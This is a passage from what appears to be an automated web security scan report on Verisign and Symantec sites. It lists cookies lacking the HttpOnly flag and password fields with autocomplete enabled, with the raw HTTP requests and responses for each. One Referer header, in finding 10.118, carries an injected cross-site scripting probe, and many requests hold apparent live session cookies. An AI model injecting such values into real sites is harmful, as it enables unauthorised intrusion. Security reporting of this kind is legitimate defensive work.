JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 8013
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;} if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)...[SNIP]...
10.109. https://trust-center.verisign.com/rcm/verisign/style/brand.css
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/style/brand.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/brand.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 7437 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css @import "vrsn.css"; #vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;} #vrsn_standard_bar_footer{border-top:1px solid #EDEDEE...[SNIP]...
10.110. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/capture_payment.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/capture_payment.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2075 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /*import from capture_payment.css - Coakley 10_5_2010 */ .radio_button {width:180px;} .blurb {padding-left:5px;padding-bottom:10px;} #tax_exemption_section {margin-left:35px;} .content_line { position...[SNIP]...
10.111. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/minimal_form.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/minimal_form.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 3324 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #quick_signin_box {position:relative;top:0px;margin:0px;} .minimal-form-gray, .minimal-form-gray * {background-color:gray;} .minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t...[SNIP]...
10.112. https://trust-center.verisign.com/rcm/verisign/style/module.css
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/module.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/module.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 698 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;} #ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po...[SNIP]...
10.113. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/product_selector.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/product_selector.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 9496 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #comparison_chart_panel{position:absolute;right:20px;top:0;} #product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;...[SNIP]...
10.114. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/vrsn.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/vrsn.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 30719 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0} a:link,a:visited{color:#1446A8;text-decoration:underline} h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}...[SNIP]...
10.115. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/assets/shared/images/sm_004276_oo.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /assets/shared/images/sm_004276_oo.gif HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:47 GMT Server: ApacheSet-Cookie: v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch Last-Modified: Wed, 19 Jan 2011 20:21:22 GMT ETag: "2e58332-255-49a38c2aff480" Accept-Ranges: bytes Content-Length: 597 X-UA-Compatible: IE=EmulateIE7 Content-Type: image/gif GIF89a . .....Bv...!..NETSCAPE2.0.....!.. ....,.... . ......h.i.X.oU...m. ..!.. ....,...... ......y........2.M.Z..!.. ....,...... .....b.x...bS.. .!.. ....,...... ...........s.M. .!.. ....,...... .......[SNIP]...
10.116. http://www.verisign.co.uk/hp07/i/vlogo.gif
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.co.uk
Path:
/hp07/i/vlogo.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hp07/i/vlogo.gif HTTP/1.1 Host: www.verisign.co.uk Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:05 GMT Server: ApacheSet-Cookie: v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk Last-Modified: Mon, 04 Apr 2011 20:53:46 GMT ETag: "29480d7-13e4-4a01df4a82a80" Accept-Ranges: bytes Content-Length: 5092 Content-Type: image/gif GIF89aZ.)...."""..0.........DDD.........333........%UUU.........#. ..............-...-)*.........fff!..... .....www..(..#"..3/0......&"#.........\YZigh...0,-$ !*&'.............F..*.........PLM......M...[SNIP]...
10.117. https://www.verisign.com/assets/visual-sciences/vip/zig.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/assets/visual-sciences/vip/zig.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /assets/visual-sciences/vip/zig.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: https://idprotect.verisign.com/toolbar/activate.v Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.verisign.com Connection: Keep-Alive Cache-Control: no-cache
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:55 GMT Server: ApacheSet-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT Accept-Ranges: bytes Content-Length: 2602 Expires: Sun, 09 Oct 2011 21:47:55 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-javascript //REFERENCE PAGE TAG var ct = "<img src="; var cd = "//www.verisign.com"; //this should contain the domain of the web site var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai...[SNIP]...
10.118. https://www4.symantec.com/Vrt/wl
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www4.symantec.com
Path:
/Vrt/wl
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
SYMC_TRANS_ID=69836485@@1315604068690; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Vrt/wl?tu_id=akMg1303300545922330202 HTTP/1.1 Host: www4.symantec.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315621972496-New%7C1336357972496%3B%20event69%3Devent69%7C1336357972499%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:34:28 GMT Content-type: text/html X-atg-version: ATGPlatform/2006.3p3 [ DASLicense/0 DPSLicense/0 ]Set-cookie: SYMC_TRANS_ID=69836485@@1315604068690; path=/ Location: https://symantec-corporation.com/servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004 Content-Length: 97 <HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
11. Password field with autocomplete enabled
There are 43 instances of this issue:
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application. The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
11.1. http://blogs.verisign.com/
Summary
Severity:
Low
Confidence:
Certain
Host:
http://blogs.verisign.com
Path:
/
Issue detail
The page contains a form with the following action URL:
https://test-products.verisign.com/geocenter/reseller/logon.do
The form contains the following password field with autocomplete enabled:
Request
GET /?tid=footer HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Wed, 11 May 2011 20:19:01 GMT ETag: "1a606f6-9f7a-c8827740" Accept-Ranges: bytes Content-Length: 40826 Content-Type: text/html; charset=UTF-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=7" /> <...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://test-products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.2. https://knowledge.verisign.ch/support/code-signing-support/index.html
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/code-signing-support/index.html
Issue detail
The page contains a form with the following action URL:
https://products.verisign.com/geocenter/reseller/logon.do
The form contains the following password field with autocomplete enabled:
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.3. https://knowledge.verisign.ch/support/digital-id-support/index.html
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/digital-id-support/index.html
Issue detail
The page contains a form with the following action URL:
https://products.verisign.com/geocenter/reseller/logon.do
The form contains the following password field with autocomplete enabled:
Request
GET /support/digital-id-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.4. https://knowledge.verisign.ch/support/mpki-support/index.html
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/mpki-support/index.html
Issue detail
The page contains a form with the following action URL:
https://products.verisign.com/geocenter/reseller/logon.do
The form contains the following password field with autocomplete enabled:
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.5. https://knowledge.verisign.ch/support/ssl-certificates-support/index
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index
Issue detail
The page contains a form with the following action URL:
https://products.verisign.com/geocenter/reseller/logon.do
The form contains the following password field with autocomplete enabled:
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]... </label> <input type="password" maxlength="20" size="16" name="password" id="partner_password"> </div>...[SNIP]...
11.6. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
Summary
Severity:
Low
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The page contains a form with the following action URL:
https://products.verisign.com/geocenter/reseller/logon.do
The form contains the following password field with autocomplete enabled:
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
